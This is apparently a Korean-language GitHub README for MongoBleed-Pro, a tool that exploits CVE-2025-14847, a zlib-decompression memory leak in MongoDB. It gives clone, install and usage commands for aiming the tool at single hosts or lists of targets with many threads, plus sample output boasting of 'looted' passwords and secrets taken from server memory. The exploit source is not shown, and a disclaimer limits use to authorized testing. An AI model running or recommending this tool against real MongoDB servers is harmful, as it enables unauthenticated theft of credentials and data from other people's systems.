
고급 MongoDB 메모리 유출 익스플로잇 도구
Alexcyberx와 함께 계속 배우기 | 계속 해킹하기
MongoBleed-Pro는 MongoDB의 zlib 압축 처리에서 발생하는 치명적인 메모리 노출 취약점인 CVE-2025-14847을 위한 고급 익스플로잇 도구입니다. 이 도구는 보안 연구자가 취약한 MongoDB 인스턴스에서 민감한 데이터를 추출할 수 있게 해줍니다.
이 도구는 승인된 보안 테스트 및 교육 목적으로만 제작되었습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 항상 적절한 승인을 받으십시오.
| 속성 | 세부 정보 |
|---|---|
| CVE ID | CVE-2025-14847 |
| 취약점 유형 | 메모리 노출 |
| 영향을 받는 버전 | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| 근본 원인 | zlib 압축 해제 시 버퍼 초과 읽기 |
| 영향 | 비인증 원격 메모리 유출 |
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| 파일 | 설명 |
|---|---|
loot_<host>.txt | 읽을 수 있는 형식으로 추출된 비밀 정보 |
dump_<host>.bin | 수동 분석을 위한 원시 메모리 덤프 |
MongoDB 관리자라면 패치된 버전으로 업데이트하세요:
alexcyberx
이 프로젝트는 MIT 라이선스로 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
이 도구가 유용했다면 GitHub에서 ⭐를 눌러주세요!
「 계속 배우기 | 계속 해킹하기 」
alexcyberx가 ❤️를 담아 만들었습니다
| 인자 | 설명 | 기본값 |
|---|
--target | 대상 IP/URL | 대화형 프롬프트 |
--file | 대상 목록이 포함된 파일 | 없음 |
--threads | 스레드 수 | 50 |
--min-offset | 최소 메모리 오프셋 | 20 |
--max-offset | 최대 메모리 오프셋 | 8192 |